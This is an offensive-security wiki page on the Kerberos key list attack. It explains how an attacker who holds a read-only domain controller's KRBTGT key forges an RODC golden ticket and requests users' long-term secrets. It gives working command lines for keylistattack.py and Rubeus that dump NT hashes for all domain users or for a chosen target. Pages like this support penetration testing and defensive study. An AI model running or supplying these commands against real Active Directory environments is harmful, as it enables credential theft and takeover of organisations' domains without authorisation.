Links

Kerberos key list

Theory

It is possible to retrieve the long term secret of a user (e.g. NT hash) by sending a TGS-REQ (service ticket request) to the KRBTGT service with a KERB-KEY-LIST-REQ message type. This was introduced initially to support SSO with legacy protocols (e.g. NTLM) with Azure AD on on-premises resources. An attacker can abuse this by forging a RODC golden ticket for a target user and use it to send a TGS-REQ to the KRBTGT service with a padata filed value of 161 (KERB-KEY-LIST-REQ). Knowing the KRBTGT key of the RODC is required here. The TGS-REP will contain the long term secret of the user in the KERB-KEY-LIST-REP key value.

Practice

UNIX-like
Windows
From UNIX-like systems, the keylistattack.py tool (Python) can be used for this purpose.
#Attempt to dump all the users' hashes even the ones in the Denied list
#Low privileged credentials are needed in the command for the SAMR enumeration
keylistattack.py -rodcNo "$KBRTGT_NUMBER" -rodcKey "$KRBTGT_AES_KEY" -full "$DOMAIN"/"$USER":"$PASSWORD"@"$RODC-server"
#Attempt to dump all the users' hashes but filter the ones in the Denied list
#Low privileged credentials are needed in the command for the SAMR enumeration
keylistattack.py -rodcNo "$KBRTGT_NUMBER" -rodcKey "$KRBTGT_AES_KEY" "$DOMAIN"/"$USER":"$PASSWORD"@"$RODC-server"
#Attempt to dump a specific user's hash
keylistattack.py -rodcNo "$KBRTGT_NUMBER" -rodcKey "$KRBTGT_AES_KEY" -t "$TARGETUSER" -kdc "$RODC_FQDN" LIST
From Windows systems, Rubeus (C#) can be used for this purpose.
# 1. Forge a RODC Golden ticket
Rubeus.exe golden /rodcNumber:$KBRTGT_NUMBER /flags:forwardable,renewable,enc_pa_rep /nowrap /outfile:ticket.kirbi /aes256:$KRBTGT_AES_KEY /user:USER /id:USER_RID /domain:domain.local /sid:DOMAIN_SID
# 2. Request a TGT via TGS-REQ request and retrieve the NT hash of the user in the response
Rubeus.exe asktgs /enctype:aes256 /keyList /ticket:ticket.kirbi /service:krbtgt/domain.local

Resources